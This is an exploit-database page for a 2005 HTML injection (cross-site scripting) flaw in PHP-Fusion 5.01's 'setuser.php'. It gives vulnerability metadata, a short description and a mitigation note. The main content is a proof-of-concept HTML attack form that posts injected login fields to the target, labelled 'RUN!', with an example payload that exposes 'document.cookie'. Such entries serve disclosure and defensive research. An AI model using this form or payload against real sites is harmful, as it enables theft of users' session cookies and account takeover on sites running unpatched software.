header-logo
Suggest Exploit
vendor:
PHP-Fusion
by:
SecurityFocus
7.5
CVSS
HIGH
HTML Injection
79
CWE
Product Name: PHP-Fusion
Affected Version From: 05.01
Affected Version To: 05.02
Patch Exists: YES
Related CWE: N/A
CPE: a:php-fusion:php-fusion
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

PHP-Fusion v5.01 Html Injection Exploit

PHP-Fusion is reportedly affected by a HTML injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input passed to the 'setuser.php' script before using it in dynamically generated content. This vulnerability is reported to affect PHP-Fusion version 5.01, however the vendor reports that the vulnerability might exist in an alteration that is planned for version 5.02. This alteration was recently released to the PHP-Fusion community as a mod for version 5.01.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in dynamically generated content.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12853/info

PHP-Fusion is reportedly affected by a HTML injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input passed to the 'setuser.php' script before using it in dynamically generated content.

This vulnerability is reported to affect PHP-Fusion version 5.01, however the vendor reports that the vulnerability might exist in an alteration that is planned for version 5.02. This alteration was recently released to the PHP-Fusion community as a mod for version 5.01.

<html>

<head>
<title>PHP-Fusion v5.01 Exploit</title>
</head>

<body>

<h1>PHP-Fusion v5.01 Html Injection Exploit</h1>


<form method="POST" action="http://www.example.com/setuser.php">
  <b>XSS in register.php:</b><p>
  Username:
  <input type="text" name="user_name" size="48" value="XSS Injection Code"></p>
  <p>
  Password:
  <input type="text" name="user_pass" size="48" value="XSS Injection Code"></p>
  <p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br>
  exmple: <script>document.write(document.cookie)</script></p>
  <p>&nbsp;<input type='submit' name='login' value='RUN!' class='button'></p>
</form>
<p>&nbsp;</p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>

</body>

</html>

Navigation

Suggest Exploit

Services By CQR